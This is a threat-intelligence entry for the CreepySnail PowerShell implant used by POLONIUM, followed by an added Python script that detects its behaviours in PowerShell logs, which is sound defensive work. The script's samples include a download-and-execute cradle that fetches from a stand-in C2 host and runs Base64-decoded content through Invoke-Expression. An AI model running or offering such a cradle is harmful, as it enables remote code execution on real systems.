CreepySnail

CreepySnail is a custom PowerShell implant that has been used by POLONIUM since at least 2022.[1]

ID: S1024
Type: MALWARE
Platforms: Windows
Version: 1.0
Created: 08 July 2022
Last Modified: 08 August 2022

Techniques Used

Domain ID Name Use
Enterprise T1071.001 Application Layer Protocol: Web Protocols

CreepySnail can use HTTP for C2.[1]

Enterprise T1059.001 Command and Scripting Interpreter: PowerShell

CreepySnail can use PowerShell for execution, including the cmdlets Invoke-WebRequest and Invoke-Expression.[1]

Enterprise T1132.001 Data Encoding: Standard Encoding

CreepySnail can use Base64 to encode its C2 traffic.[1]

Enterprise T1041 Exfiltration Over C2 Channel

CreepySnail can connect to C2 for data exfiltration.[1]

Enterprise T1016 System Network Configuration Discovery

CreepySnail can use getmac and Get-NetIPAddress to enumerate network settings.[1]

Enterprise T1033 System Owner/User Discovery

CreepySnail can execute getUsername on compromised systems.[1]

Enterprise T1078.002 Valid Accounts: Domain Accounts

CreepySnail can use stolen credentials to authenticate on target networks.[1]
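A detection check for the behaviours listed above, written as an added example that is not part of this page or of MITRE ATT&CK: it scores the text of a PowerShell Script Block Logging event (Event ID 4104) against the indicators named here and flags blocks where several of them co-occur. The iwr/iex aliases and $env:USERNAME are assumptions, and the sample events are constructed, not real CreepySnail code.

```python
import re
from collections import defaultdict

# Regexes keyed by the ATT&CK technique each behaviour maps to on this page.
# The iwr/iex aliases and $env:USERNAME are assumptions, not from the page.
INDICATORS = {
    "T1059.001": [r"\bInvoke-WebRequest\b", r"\biwr\b",
                  r"\bInvoke-Expression\b", r"\biex\b"],
    "T1132.001": [r"FromBase64String", r"ToBase64String"],
    "T1016":     [r"\bgetmac\b", r"\bGet-NetIPAddress\b"],
    "T1033":     [r"\bgetUsername\b", r"\$env:USERNAME"],
}
COMPILED = {tid: [re.compile(p, re.IGNORECASE) for p in pats]
            for tid, pats in INDICATORS.items()}

def match_techniques(script_text):
    """Return {technique_id: [matched indicator strings]} for one
    Script Block Logging event (Event ID 4104 message text)."""
    hits = defaultdict(list)
    for tid, regexes in COMPILED.items():
        for rx in regexes:
            m = rx.search(script_text)
            if m:
                hits[tid].append(m.group(0))
    return dict(hits)

def is_suspicious(script_text, min_techniques=2):
    """Flag a block only when several listed behaviours co-occur, so a lone
    admin Get-NetIPAddress does not fire; a fetch cmdlet paired with
    Invoke-Expression in the same block is enough on its own."""
    hits = match_techniques(script_text)
    cradle = {h.lower() for h in hits.get("T1059.001", [])}
    fetch = cradle & {"invoke-webrequest", "iwr"}
    run = cradle & {"invoke-expression", "iex"}
    return len(hits) >= min_techniques or bool(fetch and run)

# Constructed sample 4104 script-block texts (not real CreepySnail code).
SAMPLE_BLOCKS = {
    "benign_admin": "Get-NetIPAddress | Where-Object AddressFamily -eq 'IPv4'",
    "cradle": ("$r = Invoke-WebRequest -Uri http://c2.example.invalid/b\n"
               "Invoke-Expression ([Text.Encoding]::UTF8.GetString("
               "[Convert]::FromBase64String($r.Content)))"),
    "recon": "getmac /fo csv; getUsername; Get-NetIPAddress",
}

if __name__ == "__main__":
    for name, text in SAMPLE_BLOCKS.items():
        print(name, is_suspicious(text), match_techniques(text))
```

In practice, feed it the ScriptBlockText field of 4104 events from the Microsoft-Windows-PowerShell/Operational log and tune min_techniques to the environment's baseline.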

Groups That Use This Software

ID Name References
G1005 POLONIUM [1]

References